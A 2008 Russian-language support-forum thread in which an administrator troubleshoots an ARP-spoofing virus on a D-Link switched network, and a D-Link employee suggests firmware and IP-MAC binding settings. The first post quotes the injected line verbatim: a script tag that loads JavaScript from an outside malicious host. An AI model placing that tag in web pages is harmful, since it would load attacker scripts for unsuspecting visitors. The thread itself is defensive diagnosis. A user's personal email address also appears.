faq обучение настройка
Текущее время: Ср июл 23, 2025 14:41

Часовой пояс: UTC + 3 часа




Начать новую тему Ответить на тему  [ Сообщений: 98 ]  На страницу 1, 2, 3, 4, 5 ... 7  След.
Автор Сообщение
 Заголовок сообщения: Вирус в сети mx.content-type.cn
СообщениеДобавлено: Пт июл 04, 2008 10:41 
Не в сети

Зарегистрирован: Вс окт 21, 2007 22:09
Сообщений: 74
Откуда: Владимир
В сети завелася вирус у кого-то из пользователей, похоже.
У нас стоит Интернет сервер win 2003+биллинг Трафик Инспектор (аторизация без VPN). Сеть на свичах DES-3526. У всех портов прописаны MAC-IP binding.
Все работает нормально, до того момента как в сети начинают появляться некоторые пользователи.
И тут начинается интересная вещь. У всех пользователей во все запршиваемые интернет странички , даже с локального web-сервера начинает встариваться первой строчкой вот такое дело <script language="javascript" SRC="http://mx.content-type.cn:443/day.js">
В логах нескольких свичей нашел записи относящиеся к портам пользователей типа такой "Unauthenticated IP-MAC address and discarded by ip mac port binding (IP: 192.168.0.200, MAC: 00-01-6C-C7-F0-4E, port: 10)", адрес нашего интернет сервера 192.168.0.200.
На лицо попытка подмены IP, перехват http трафика и добавление в него своих ссылок.
Я отключил таких пользователей. Но проблема подстановки сылки не исчесзла. Она исчезает, если только отрубить всю сеть.
И еще я обнаружил, несмотря на то, что прописаны MAC-IP Binding, если задать на машине ip несоответсвующих этой паре, но соответсвующей адресу другой машины в сети, то все равно происходит конфликт IP адресов.
Возникают 2 вопроса:
как же работает этот вирус когда четко прописаны все ip-mac адреса и как защититься от такого вида вирусов.
Как сделать так чтобы небыло конфликтов IP

Вот что нашел на сайте McAfee "FDoS-Tatol will use ARP spoofing on the local LAN. It will sniff for HTTP replies and inject a JS script into the body of the HTML page. The script embeds an IFrame which points to a remote site hosting malicious scripts."


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Пт июл 04, 2008 12:05 
Не в сети
Сотрудник D-LINK
Сотрудник D-LINK

Зарегистрирован: Пт май 13, 2005 15:49
Сообщений: 20616
Откуда: D-Link, Moscow
Какая у вас версия прошивки?


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Пт июл 04, 2008 12:53 
Не в сети

Зарегистрирован: Вс окт 21, 2007 22:09
Сообщений: 74
Откуда: Владимир
Версия 5.01-B09


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Пт июл 04, 2008 14:27 
Не в сети
Сотрудник D-LINK
Сотрудник D-LINK

Зарегистрирован: Пт май 13, 2005 15:49
Сообщений: 20616
Откуда: D-Link, Moscow
Пожалуйста обновите прошивку на ту что я Вам выслал и выставите при настройке IMP на порту режим strict.


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Пт июл 04, 2008 15:36 
Не в сети

Зарегистрирован: Вс окт 21, 2007 22:09
Сообщений: 74
Откуда: Владимир
Что-то не пришло, может на другой адрес попробуете.
lexa-koresh@yandex.ru


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Пт июл 04, 2008 16:49 
Не в сети
Сотрудник D-LINK
Сотрудник D-LINK

Зарегистрирован: Пт май 13, 2005 15:49
Сообщений: 20616
Откуда: D-Link, Moscow
Я Вам прошивку выслал.


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Пт июл 04, 2008 17:21 
Не в сети

Зарегистрирован: Вт май 16, 2006 13:02
Сообщений: 867
Откуда: Ukraine
А когда релиз будет, а то я затарился и мне нужна надёжная прошивка.

И вопрос по поводу обновления прошивки.
Как понять какой имидж спрятан вимидж 2, какая там версия и чо там лежит ?
Это типа нужно для тестовой загрузки ранее загруженной прошивки ?
Изображение


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Пт июл 04, 2008 17:29 
Не в сети
Сотрудник D-LINK
Сотрудник D-LINK

Зарегистрирован: Пт май 13, 2005 15:49
Сообщений: 20616
Откуда: D-Link, Moscow
Релиз будет в июле-августе. Просто с новой прошивкой не используйте второй имидж, заливайте сразу в первый и единственный.


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Пт июл 04, 2008 19:34 
Не в сети

Зарегистрирован: Вс окт 21, 2007 22:09
Сообщений: 74
Откуда: Владимир
Установили прошивку на все коммутаторы. Установили Striсt на всех юзверьских портах. Разницы никакой. Так же возникает конфликт IP у "правильных машин" при установке несвоего ip на другой машине.
А вирус продолжает свой вредоносный труд.


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Пт июл 04, 2008 20:19 
Не в сети

Зарегистрирован: Вс окт 21, 2007 22:09
Сообщений: 74
Откуда: Владимир
Оять "подозрительных" юзверей отключили. Стало получше. но все равно у кого-то сидит зараза.

Что можно еще на свичах сделать чтобы избавиться от ARP Spoofinga?
И еще бы сделать, чтоб не отключалась машина с "правильным IP", когда в другой машине вбили несвой ip,


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Пт июл 04, 2008 20:32 
Не в сети
Сотрудник D-LINK
Сотрудник D-LINK

Зарегистрирован: Пт май 13, 2005 15:49
Сообщений: 20616
Откуда: D-Link, Moscow
Попробуйте сделать как описано здесь http://www.dlink.ru/technical/faq_hub_switch_115.php


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Пт июл 04, 2008 20:46 
Не в сети

Зарегистрирован: Вт май 16, 2006 13:02
Сообщений: 867
Откуда: Ukraine
Да, настроить эту чтуку будет реально не просто.


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Пт июл 04, 2008 21:28 
Не в сети
Сотрудник D-LINK
Сотрудник D-LINK

Зарегистрирован: Пт май 13, 2005 15:49
Сообщений: 20616
Откуда: D-Link, Moscow
А что сложного если не секрет?


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Сб июл 05, 2008 00:07 
Не в сети

Зарегистрирован: Вт май 16, 2006 13:02
Сообщений: 867
Откуда: Ukraine
Если бы вы хотели выслушать я бы тут написал мемуар с вопросами.


Вернуться наверх
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: Сб июл 05, 2008 08:54 
Не в сети

Зарегистрирован: Вс окт 21, 2007 22:09
Сообщений: 74
Откуда: Владимир
Мдяяяяяя......
Трудоемкакая задачка.
Этож нужно каждому порту прописывать.
А если у пользователя меняется сетевая карта, то еще раз дописывать.
Не ужто кто так вправду делает????

А в новой ожидаемой прошивке будет инструмент для предотвращения подобного?


Вернуться наверх
 Профиль  
 
Показать сообщения за:  Сортировать по:  
Начать новую тему Ответить на тему  [ Сообщений: 98 ]  На страницу 1, 2, 3, 4, 5 ... 7  След.

Часовой пояс: UTC + 3 часа


Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 31


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете добавлять вложения

Найти:
Перейти:  
Создано на основе phpBB® Forum Software © phpBB Group
Русская поддержка phpBB